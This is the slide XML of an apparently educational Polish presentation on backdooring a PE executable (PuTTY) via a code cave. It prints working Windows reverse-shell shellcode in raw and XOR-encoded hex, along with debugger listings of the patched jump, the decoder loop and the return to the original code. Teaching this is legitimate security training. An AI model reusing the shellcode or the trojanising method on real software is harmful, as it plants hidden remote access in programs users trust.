              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD7396F8-75C4-239A-373B-6FCB792671E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9144000" y="1960497"/>
            <a:ext cx="1975125" cy="197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CAVE WITH DECODER</a:t>
            </a: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6668E4B6-B825-8200-D3BA-881F59BD7578}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="16" idx="4"/>
            <a:endCxn id="19" idx="6"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8204828" y="3935622"/>
            <a:ext cx="1926735" cy="135208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4E77791C-C2E8-1A61-9C87-AC86F15A3900}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="12" idx="4"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6141871" y="2688701"/>
            <a:ext cx="765669" cy="168357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wal 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D132022-2FED-6AE5-BAC1-F238D66291F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1273945" y="4085043"/>
            <a:ext cx="2318657" cy="231865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FUNCTIONALITY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511357F4-3318-E5A6-3DB5-ABD31102FA69}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3420836" y="2632255"/>
            <a:ext cx="2318657" cy="193158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E0485C16-22E0-48CF-01EC-491BB96D7951}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19434298">
            <a:off x="8488732" y="4568231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jump to payload</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="214675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 animBg="1"/>
      <p:bldP spid="12" grpId="0" animBg="1"/>
      <p:bldP spid="19" grpId="0" animBg="1"/>
      <p:bldP spid="15" grpId="0"/>
      <p:bldP spid="16" grpId="0" animBg="1"/>
      <p:bldP spid="23" grpId="0" animBg="1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4560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 ENCODING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77FBE3-DF41-A41D-75CA-ECC51989510D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="439750" y="890358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XOR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3C6B0FA0-398E-A111-7C66-D55401BF9CB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1956465" y="20573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0xFC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0FA4038-5A07-E807-26BB-E672E2343862}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1969593" y="180203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HEX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8C959D4F-4D83-78EE-9E5C-5625F9733F95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3047757" y="205739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11111100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4148C1D-0FBE-DA77-FE00-8F7C90380DA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3047757" y="1802037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8BD91F-DB0F-E636-5D22-29E66ACC1921}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5260280" y="205739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0x2E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6D31430-AD50-D872-59C2-E03950DDA69F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5273408" y="180203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HEX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7315D11-FA35-C6BB-1421-0F776CD56ED3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6351572" y="2057398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000101110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0354D21-0C32-7333-0533-D39FF3E0F2F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6351572" y="1802037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BIN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D094D09-67B7-28A9-5AE0-60250BAB5199}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3806035" y="31673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00101110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D22417E5-7FF2-5FB7-1349-D09A371EA578}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3806036" y="278946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11111100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C4609838-099C-24D6-CC79-D2CF97DEC390}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3282757" y="3090446"/>
            <a:ext cx="628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XOR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5" name="Łącznik prosty 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{012132B9-18F4-0C52-F6E6-21E5B7C2B889}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3398223" y="3690610"/>
            <a:ext cx="20800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B429E55-D81D-F2AD-54BB-6FE143A1625C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3813713" y="3729983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11010010</a:t>
            </a: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59A41E5-3EFC-AF99-A346-76A2950BDFF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3398223" y="3846300"/>
            <a:ext cx="537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BIN</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0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08F8DD05-DED3-25D3-FEAC-BEA09B22E56C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4594713" y="4100277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0xD2</a:t>
            </a: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4C4930BB-F6A2-FA96-B7C2-EFAD663EFB5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4099443" y="4236067"/>
            <a:ext cx="6046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HEX</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1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47C7D966-E476-47A7-FD53-9A5915CEA18E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1969593" y="1431743"/>
            <a:ext cx="2048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BAJT SHELLCODU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pole tekstowe 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66CC093A-BFAD-D810-8D4A-BBDBABB10C90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5260280" y="1416743"/>
            <a:ext cx="877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KLUCZ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855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 ENCODING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77FBE3-DF41-A41D-75CA-ECC51989510D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="489178" y="1294911"/>
            <a:ext cx="143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ORIGINAL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05D6B871-0144-D63A-8B6E-B7892644A1CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6182405" y="1294911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ENCODED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7D0128E8-243F-463F-DFEE-B776E02E20B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6182405" y="1695021"/>
            <a:ext cx="517683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cap="all" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dd c9 a3 21 21 21 41 a8 c4 10 e1 45 aa 71 11 aa 73 2d aa 73 35 aa 53 09 2e 96 6b 07 10 de 8d 1d 40 5d 23 0d 01 e0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" cap="all" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" cap="all" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 2c 20 e6 c3 d3 73 76 aa 73 31 aa 6b 1d aa 6d 30 59 c2 69 20 f0 70 aa 78 01 20 f2 aa 68 39 c2 1b 68 aa 15 aa 20 f7 10 de 8d e0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" cap="all" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" cap="all" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 2c 20 e6 19 c1 54 d7 22 5c d9 1a 5c 05 54 c5 79 aa 79 05 20 f2 47 aa 2d 6a aa 79 3d 20 f2 aa 25 aa 20 f1 a8 65 05 05 7a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" cap="all" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>7a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" cap="all" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 40 78 7b 70 de c1 7e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" cap="all" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>7e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" cap="all" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 7b aa 33 ca ac 7c 49 12 13 21 21 49 56 52 13 7e 75 49 6d 56 07 26 de f4 99 b1 20 21 21 08 e5 75 71 49 08 a1 4a 21 de f4 71 71 71 71 61 71 61 71 49 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" cap="all" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" cap="all" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 2e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" cap="all" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" cap="all" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> c1 de f4 b6 4b 24 49 5e 21 21 20 49 23 21 30 7d a8 c7 4b 31 77 76 49 b8 84 55 40 de f4 a4 e1 55 2d de 6f 29 54 cd 49 d1 94 83 77 de f4 49 42 4c 45 21 a8 c2 76 76 76 10 d7 4b 33 78 77 c3 dc 47 e6 65 05 1d 20 20 ac 65 05 31 e7 21 65 75 71 77 77 77 67 77 6f 77 77 72 77 49 58 ed 1e a7 de f4 a8 c1 b1 77 67 de 11 49 29 a6 3c 41 de f4 9a d1 94 83 77 49 87 b4 9c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" cap="all" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" cap="all" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> de f4 1d 27 5d 2b a1 da c1 54 24 9a 66 32 53 4e 4b 21 72 b1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" cap="all" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>b1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" cap="all" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p: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4CE9939C-0E2F-B30E-B223-969C3D20C360}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="489179" y="1695021"/>
            <a:ext cx="53972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FC E8 82 00 00 00 60 89 E5 31 C0 64 8B 50 30 8B 52 0C 8B 52 14 8B 72 28 0F B7 4A 26 31 FF AC 3C 61 7C 02 2C 20 C1 CF 0D 01 C7 E2 F2 52 57 8B 52 10 8B 4A 3C 8B 4C 11 78 E3 48 01 D1 51 8B 59 20 01 D3 8B 49 18 E3 3A 49 8B 34 8B 01 D6 31 FF AC C1 CF 0D 01 C7 38 E0 75 F6 03 7D F8 3B 7D 24 75 E4 58 8B 58 24 01 D3 66 8B 0C 4B 8B 58 1C 01 D3 8B 04 8B 01 D0 89 44 24 24 5B </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>5B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 61 59 5A 51 FF E0 5F </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>5F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 5A 8B 12 EB 8D 5D 68 33 32 00 00 68 77 73 32 5F 54 68 4C 77 26 07 FF D5 B8 90 01 00 00 29 C4 54 50 68 29 80 6B 00 FF D5 50 50 50 50 40 50 40 50 68 EA 0F DF E0 FF D5 97 6A 05 68 7F 00 00 01 68 02 00 11 5C 89 E6 6A 10 56 57 68 99 A5 74 61 FF D5 85 C0 74 0C FF 4E 08 75 EC 68 F0 B5 A2 56 FF D5 68 63 6D 64 00 89 E3 57 57 57 31 F6 6A 12 59 56 E2 FD 66 C7 44 24 3C 01 01 8D 44 24 10 C6 00 44 54 50 56 56 56 46 56 4E 56 56 53 56 68 79 CC 3F 86 FF D5 89 E0 4E 56 46 FF 30 68 08 87 1D 60 FF D5 BB F0 B5 A2 56 68 A6 95 BD 9D FF D5 3C 06 7C 0A 80 FB E0 75 05 BB 47 13 72 6F 6A 00 53 FF D5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p: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5D99C7EE-D0E2-9136-8323-CFEB19A83E8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625193" y="3895624"/>
            <a:ext cx="557212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3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28" grpId="0"/>
      <p:bldP spid="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8AD0F771-3613-D52D-3E14-8360B4D45042}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367393" y="318407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 ENCODING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FE77FBE3-DF41-A41D-75CA-ECC51989510D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="439750" y="890358"/>
            <a:ext cx="14702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DECODER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99F250C-17BE-940F-4784-BF4F5B684833}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="439750" y="1519068"/>
            <a:ext cx="66278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highlight>
                  <a:srgbClr val="3CB5EA"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0045909B | 68 FC834D00 | push putty.4D83FC | 4D83FC:"login as: "</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:highlight>
                <a:srgbClr val="ED1B24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0045909B | E9 36A20900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0x004F32D6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004590A0 | E8 0B4AFEFF | call 0x0043DAB0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004590A5 | 83C4 04     | add esp,4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65BBC59-35AE-9B9A-17D8-6FA9654D096F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5418759" y="2230516"/>
            <a:ext cx="687228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004F32D6 | 60            | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="ED1B24"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pushad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="ED1B24"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                            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004F32D7 | 9C            | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pushfd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004F32D8 | BB F0324F00   | mov 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0x004F32F0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004F32DD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> | 8033 2E       | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> byte </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ds:[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],</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3CB5EA"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0x2E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004F32E0 | 43            | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>inc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004F32E1 | 81FB 33344F00 | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cmp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ED1B24"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx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highlight>
                  <a:srgbClr val="FF00FF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0x004F3433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004F32E7 | 7E F4         | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>jle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0x004F32DD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004F32E9 | EB 05         | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>jmp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0x004F32F0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004F32F0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> | D2C6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1400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FF00FF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>004F3433</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> | BE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004F3438 | 81C4 04020000 | add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esp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, 0x204 </a:t>
            </a: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004F343E | 9D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popfd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0"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effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>004F343F | 61            |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popad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400" b="0" dirty="0">
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="3CB5EA"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>004F3440 | 68 FC834D00   | push 0x004D83FC | 4D83FC:"login as: "</a:t>
            </a:r>
          </a:p>
          <a:p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004F3445 | E9 725CF6FF   | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1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jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="ED1B24"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 0x004590A0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6" name="Łącznik: zakrzywiony 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BAB5576-C113-1A75-D349-30E6A8328589}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4482260" y="1895780"/>
            <a:ext cx="936499" cy="473528"/>
          </a:xfrm>
          <a:prstGeom prst="curved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: zakrzywiony 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8632255-E1D7-7C91-0199-158AC28E2438}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="4" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="439750" y="1996123"/>
            <a:ext cx="4979008" cy="3785553"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 104591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rzałka: zakrzywiona w prawo 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CED73F3-0AD1-3851-25E1-80B64E99EAD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4870121" y="2895599"/>
            <a:ext cx="548640" cy="840918"/>
          </a:xfrm>
          <a:prstGeom prst="curvedRightArrow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trzałka: zakrzywiona w prawo 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{091FBE26-65FC-21AC-50DD-3134F360C850}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4870118" y="3811496"/>
            <a:ext cx="548640" cy="622669"/>
          </a:xfrm>
          <a:prstGeom prst="curvedRightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ED1B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78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4518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STRUKTURA PLIKÓW PE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="DOS header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE9B209B-B113-DA21-2E22-997C5CD0BD44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3601710" y="903800"/>
            <a:ext cx="4582886" cy="719133"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0DB007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DOS header</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="DOS stub">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
